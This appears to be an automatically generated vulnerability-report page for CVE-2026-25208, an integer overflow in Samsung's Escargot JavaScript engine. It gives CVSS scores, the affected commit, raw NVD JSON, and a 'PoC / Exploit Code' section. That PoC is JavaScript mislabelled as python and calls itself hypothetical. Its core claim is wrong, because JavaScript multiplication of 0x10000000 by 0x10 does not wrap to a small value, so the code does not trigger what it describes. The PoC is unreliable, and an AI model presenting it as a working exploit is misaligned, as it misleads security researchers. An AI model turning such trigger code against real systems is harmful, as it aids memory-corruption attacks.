Security Vulnerability Report
中文
CVE-2026-25208 CVSS 8.1 HIGH

CVE-2026-25208

Published: 2026-04-13 05:16:03
Last Modified: 2026-04-28 20:47:38

Description

Integer overflow vulnerability in Samsung Open Source Escargot allows Overflow Buffers.This issue affects Escargot: 97e8115ab1110bc502b4b5e4a0c689a71520d335.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:samsung:escargot:2026-03-26:*:*:*:*:*:*:* - VULNERABLE
Samsung Escargot commit 97e8115ab1110bc502b4b5e4a0c689a71520d335

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC Concept for CVE-2026-25208 (Integer Overflow leading to Buffer Overflow) // This script demonstrates the logic of triggering an integer overflow in Escargot. // Note: Actual exploitation requires specific memory layout and heap grooming. function trigger_cve_2026_25208() { try { // Step 1: Define values that cause overflow when multiplied // Example: 0x10000000 * 0x10 overflows a 32-bit integer var size_a = 0x10000000; var size_b = 0x10; // Step 2: Simulate the vulnerable allocation calculation // The engine might calculate size = size_a * size_b without checking overflow // Result wraps to a small number (e.g., 0x00000000) // Hypothetical vulnerable API call (Representation) // In real Escargot, this could be Array allocation or TypedArray buffer creation var victim_buffer = new ArrayBuffer(size_a * size_b); // Step 3: Attempt to write beyond the allocated small buffer var view = new Uint8Array(victim_buffer); // Writing a large amount of data to the small buffer triggers the overflow for (var i = 0; i < 0x1000; i++) { view[i] = 0x41; // Write 'A' } console.log("[+] If no crash, the engine might have mitigated the overflow."); } catch (e) { console.log("[-] Exception triggered: " + e); } } // Execute trigger_cve_2026_25208();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25208", "sourceIdentifier": "[email protected]", "published": "2026-04-13T05:16:02.800", "lastModified": "2026-04-28T20:47:37.673", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Integer overflow vulnerability in Samsung Open Source Escargot allows Overflow Buffers.This issue affects Escargot: 97e8115ab1110bc502b4b5e4a0c689a71520d335."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samsung:escargot:2026-03-26:*:*:*:*:*:*:*", "matchCriteriaId": "E56434D9-B453-4690-8092-5F07D266E58D"}]}]}], "references": [{"url": "https://github.com/Samsung/escargot/pull/1554", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}